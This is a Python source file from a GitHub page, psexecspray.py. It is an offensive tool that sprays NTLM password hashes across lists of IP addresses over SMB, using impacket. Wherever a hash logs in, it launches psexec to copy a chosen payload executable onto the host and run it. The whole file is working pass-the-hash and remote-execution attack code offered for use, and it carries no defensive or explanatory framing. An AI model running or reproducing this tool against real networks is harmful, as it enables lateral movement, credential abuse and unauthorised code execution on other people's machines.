-
Notifications
You must be signed in to change notification settings - Fork 7
/
psexecspray.py
executable file
·126 lines (108 loc) · 4.58 KB
/
psexecspray.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
#!/usr/bin/python
import psexec
import time
import blessed
import sys
import re
import argparse
import signal
from impacket.smbconnection import *
import multiprocessing
class timeout:
def __init__(self, seconds, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise Exception(self.error_message)
def __enter__(self):
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
t = blessed.Terminal()
def StartPsexec(exeFile, targetusername, psexechash, targetdomain, psexecip):
PSEXEC = psexec.PSEXEC(command="", path="", exeFile=exeFile, copyFile="", protocols=None, username=targetusername,
hashes=psexechash, domain=targetdomain, password='', aesKey=None, doKerberos=False)
print(t.bold_green + "\n[*] Starting Psexec...." + t.normal)
time.sleep(15)
try:
PSEXEC.run(psexecip)
except SessionError:
print(t.bold_red + "[*] Clean Up Failed, Remove Manually with Shell")
def DoPsexecSpray(exeFile, hashfile="", ipfile="", username="", domain=""):
targetsprayhash = []
targetipseperated = []
workinghashes = []
print(t.bold_green + "[*] Chosen Payload: " + t.normal + exeFile)
if not hashfile:
targethash = input("[*] Enter Hashes Seperated by Comma: ")
targetsprayhash = targethash.split(",")
else:
print(t.bold_green + "[*] Hash File Selected: " + t.normal + hashfile)
file = open(hashfile, "r")
for hash in file:
targetsprayhash.append(hash.strip("\n"))
if not ipfile:
targetips = input("[*] Enter IP's Serperated by Comma:")
targetipseperated = targetips.split(',')
else:
print(t.bold_green + "[*] IP File Selected: " + t.normal + ipfile)
file = open(ipfile, "r")
for ip in file:
targetipseperated.append(ip.strip("\n"))
if not username:
targetusername = input("[*] Enter Username: ")
else:
targetusername = username
if not domain:
targetdomain = input("[*] Enter Domain: ")
else:
targetdomain = domain
for ip in targetipseperated:
for hash in targetsprayhash:
targetlm, targetnt = hash.split(':')
print(t.green + "[*] NT:LM Hash: " + t.normal + hash.strip(' ') + "," + ip)
try:
with timeout(8):
smb = SMBConnection(ip, ip, sess_port=445)
except Exception as E:
print(t.bold_red + "[!!] Timed Out!" + t.normal)
print(E)
continue
try:
smb.login(user=targetusername, password='',
domain=targetdomain, lmhash=targetlm, nthash=targetnt)
print(t.bold_green + "[!] This Hash Worked - " + smb.getServerName() + t.normal)
workinghashes.append(hash + "," + ip)
except Exception as E:
print(t.bold_red + "[!] This Hash Failed" + t.normal)
print(E)
if workinghashes:
print(t.green + "\n[*] Working Hashes:")
for hash in workinghashes:
print(t.bold_green + hash + t.normal)
want_to_psexec = input("[*] Run Psexec on Working Hashes? [Y/n]: ")
if want_to_psexec.lower() == "y" or want_to_psexec == "":
for hash in workinghashes:
psexechash, psexecip = hash.split(",")
b = multiprocessing.Process(
target=StartPsexec, args=(exeFile, targetusername, psexechash, targetdomain, psexecip))
if __name__ == "__main__":
b.daemon = False
else:
b.daemon = True
b.start()
else:
print(t.bold_red + "[!] No Working Hashes. Exiting..." + t.normal)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Spray Smb Hashes and Psexec')
parser.add_argument(
"-hashfile", help="Parse Hashes from a File (Hashes Seperated by New Line)", default="")
parser.add_argument(
"-ipfile", help="Parse IP's from a File (IP's Seperated by New Line)", default="")
parser.add_argument("-username", help="Set Username", default="")
parser.add_argument("-domain", help="Set Domain", default="")
parser.add_argument("payloadpath", help="Select Payload for Psexec")
args = parser.parse_args()
DoPsexecSpray(args.payloadpath, args.hashfile,
args.ipfile, args.username, args.domain)